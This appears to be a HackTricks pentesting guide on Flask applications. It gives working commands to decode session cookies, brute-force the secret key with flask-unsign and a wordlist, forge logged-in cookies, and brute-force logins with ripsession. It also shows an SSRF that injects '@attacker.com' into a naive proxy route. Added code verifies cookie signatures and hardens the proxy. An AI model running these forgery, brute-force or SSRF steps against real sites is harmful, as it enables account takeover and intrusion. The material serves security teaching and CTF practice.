Flask

Tip

Learn and practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn and practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn and practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE). Browse the full HackTricks Training catalogue for the assessment paths (ARTA/GRTA/AzRTA) and Linux Hacking Expert (LHE).

Support HackTricks

If you are playing a CTF, a Flask application is very likely to involve SSTI.

Cookies

The default name of the session cookie is session.

Decoder

Online Flask cookie decoder: https://www.kirsle.net/wizards/flask-session.cgi

Manual

Take the first part of the cookie, up to the first dot (.), and Base64 decode it:

echo "ImhlbGxvIg==" | base64 -d   # the cookie omits the '=' padding; add it back so base64 -d accepts the input

The cookie is also signed using a password (the application's secret key).
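The layout behind that manual decode, as an added example (not code from the original page): parse a Flask session cookie into its three parts and reproduce Flask's signing scheme with only the standard library, so you can inspect a cookie and check whether it was signed with your own SECRET_KEY. It assumes Flask's defaults (itsdangerous URLSafeTimedSerializer, salt "cookie-session", HMAC key derivation, SHA-1 digest, compact JSON payload); the sample cookie is the one shown further down this page, and the "CHANGEME" secret and session data used in the round trip are constructed values.

```python
# Added example (not code from the original page): parse a Flask session cookie and
# reproduce Flask's signing scheme with only the standard library, so you can
# inspect a cookie and check whether it was signed with your own SECRET_KEY.
# Scheme assumed (Flask's defaults): itsdangerous URLSafeTimedSerializer, salt
# "cookie-session", key_derivation="hmac", SHA-1 digest, compact JSON payload.
# The "CHANGEME" secret and the session data in the usage section are constructed.
import base64
import hashlib
import hmac
import json
import time
import zlib
from typing import Optional

SALT = b"cookie-session"  # fixed salt Flask passes to itsdangerous


def b64url_decode(s: str) -> bytes:
    # itsdangerous strips '=' padding from every segment; restore it first
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def b64url_encode(b: bytes) -> str:
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode()


def derive_key(secret: str) -> bytes:
    # key_derivation="hmac": the signing key is HMAC-SHA1(SECRET_KEY, salt)
    return hmac.new(secret.encode(), SALT, hashlib.sha1).digest()


def parse_session_cookie(cookie: str) -> dict:
    """Split '<payload>.<timestamp>.<signature>' and decode the first two parts."""
    payload_b64, ts_b64, sig_b64 = cookie.rsplit(".", 2)
    compressed = payload_b64.startswith(".")  # leading '.' marks a zlib-compressed payload
    raw = b64url_decode(payload_b64[1:] if compressed else payload_b64)
    if compressed:
        raw = zlib.decompress(raw)
    return {
        "data": json.loads(raw),
        "timestamp": int.from_bytes(b64url_decode(ts_b64), "big"),
        "signature": sig_b64,
        "signed_part": f"{payload_b64}.{ts_b64}",  # the bytes the HMAC covers
    }


def verify_session_cookie(cookie: str, secret: str, max_age: Optional[int] = None) -> Optional[dict]:
    """Return the session data if `secret` produced the signature (and the cookie
    is not older than max_age seconds), otherwise None."""
    parsed = parse_session_cookie(cookie)
    expected = hmac.new(derive_key(secret), parsed["signed_part"].encode(), hashlib.sha1).digest()
    if not hmac.compare_digest(b64url_encode(expected).encode(), parsed["signature"].encode()):
        return None
    if max_age is not None and time.time() - parsed["timestamp"] > max_age:
        return None
    return parsed["data"]


def sign_session(data: dict, secret: str, timestamp: Optional[int] = None) -> str:
    """Build a cookie the way Flask does; used here to exercise the verifier."""
    # Flask's default JSON provider sorts keys and uses compact separators
    body = json.dumps(data, sort_keys=True, separators=(",", ":")).encode()
    comp = zlib.compress(body)
    # itsdangerous compresses only when that saves at least two bytes
    payload = "." + b64url_encode(comp) if len(comp) < len(body) - 1 else b64url_encode(body)
    ts = int(time.time()) if timestamp is None else timestamp
    ts_b64 = b64url_encode(ts.to_bytes((ts.bit_length() + 7) // 8, "big"))
    signed_part = f"{payload}.{ts_b64}"
    sig = hmac.new(derive_key(secret), signed_part.encode(), hashlib.sha1).digest()
    return f"{signed_part}.{b64url_encode(sig)}"


if __name__ == "__main__":
    # Cookie shown on this page: it decodes without any secret, which is why
    # session contents must never be treated as confidential.
    page_cookie = "eyJsb2dnZWRfaW4iOmZhbHNlfQ.XDuWxQ.E2Pyb6x3w-NODuflHoGnZOEpbH8"
    print(parse_session_cookie(page_cookie)["data"])
    # Round trip with a constructed secret; a wrong key is rejected.
    c = sign_session({"logged_in": True, "user": "alice"}, "CHANGEME")
    print(verify_session_cookie(c, "CHANGEME"), verify_session_cookie(c, "not-the-key"))
```

The only thing standing between a reader of the cookie and a forged session is the entropy of SECRET_KEY: everything else (payload, timestamp, algorithm) is public, so a guessable key is equivalent to no signature at all.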

Flask-Unsign

A command line tool to fetch, decode, brute-force and craft session cookies of a Flask application by guessing secret keys.

Decode

pip3 install flask-unsign
flask-unsign --decode --cookie 'eyJsb2dnZWRfaW4iOmZhbHNlfQ.XDuWxQ.E2Pyb6x3w-NODuflHoGnZOEpbH8'

Brute Force

flask-unsign --wordlist /usr/share/wordlists/rockyou.txt --unsign --cookie '<cookie>' --no-literal-eval

Sign

flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME'

Sign using legacy versions

flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME' --legacy

RIPsession

A command line tool to brute-force websites using cookies crafted with flask-unsign.

GitHub - Tagvi/ripsession: A command line tool to brute-force websites using cookies crafted with flask-unsign

ripsession -u 10.10.11.100 -c "{'logged_in': True, 'username': 'changeMe'}" -s password123 -f "user doesn't exist" -w wordlist.txt

This example uses the sqlmap eval option to automatically sign sqlmap payloads for Flask using a known secret.

Flask Proxy to SSRF

This writeup explains how Flask accepts a request whose target starts with the "@" character:

GET @/ HTTP/1.1
Host: target.com
Connection: close

Which, in the following scenario:

from flask import Flask
from requests import get

app = Flask('__main__')
SITE_NAME = 'https://google.com/'

# Every path is forwarded to SITE_NAME by plain string concatenation,
# with no check of where the resulting URL actually points.
@app.route('/', defaults={'path': ''})
@app.route('/<path:path>')
def proxy(path):
    return get(f'{SITE_NAME}{path}').content

app.run(host='0.0.0.0', port=8080)

can allow something like "@attacker.com" to be injected, causing an SSRF.
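A hardened way to build the upstream URL for a proxy route like the one above, as an added example (not code from the writeup or the original page): the user-controlled path is still appended to SITE_NAME, but the result is parsed and must keep the configured scheme, host and port, and must carry no "user@host" (userinfo) component, before any request is sent. The SITE_NAME values and paths used below are constructed samples, and UnsafeProxyTarget and proxy_target are names introduced here.

```python
# Added example (not code from the writeup or the original page): a hardened way
# to build the upstream URL for a proxy route. The user-controlled path is still
# appended to SITE_NAME, but the result is parsed and must keep the configured
# scheme/host/port and carry no userinfo before any request is sent.
# SITE_NAME values and paths below are constructed samples.
from urllib.parse import urlsplit


class UnsafeProxyTarget(ValueError):
    """The requested path would make the proxy talk to a different origin."""


def build_upstream_url(site_name: str, path: str) -> str:
    """Return the URL the proxy may fetch for `path`, or raise UnsafeProxyTarget."""
    candidate = f"{site_name}{path}"  # same concatenation as the proxy above
    expected = urlsplit(site_name)
    parts = urlsplit(candidate)
    try:
        same_port = parts.port == expected.port  # .port raises on a garbled authority
    except ValueError:
        raise UnsafeProxyTarget(f"unparseable authority in {candidate!r}")
    if parts.scheme != expected.scheme or parts.hostname != expected.hostname or not same_port:
        # e.g. "https://google.com" + "@attacker.com/" parses with host attacker.com
        raise UnsafeProxyTarget(f"origin changed: {parts.scheme}://{parts.netloc}")
    if parts.username is not None or parts.password is not None:
        # the configured host has been demoted to userinfo ("google.com@...")
        raise UnsafeProxyTarget(f"userinfo in upstream URL: {parts.netloc!r}")
    return candidate


def proxy_target(site_name: str, path: str) -> tuple:
    """What a Flask view would do before calling requests: (status, url_or_error)."""
    try:
        return 200, build_upstream_url(site_name, path)
    except UnsafeProxyTarget as exc:
        return 400, str(exc)


if __name__ == "__main__":
    print(proxy_target("https://google.com/", "search?q=flask"))
    print(proxy_target("https://google.com", "@attacker.com/"))
```

In the view, call build_upstream_url(SITE_NAME, path) and return a 400 on UnsafeProxyTarget instead of passing the raw concatenation to requests; checking the parsed hostname rather than the string prefix is what catches the userinfo form, since "https://google.com@attacker.com" still starts with the configured site name.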
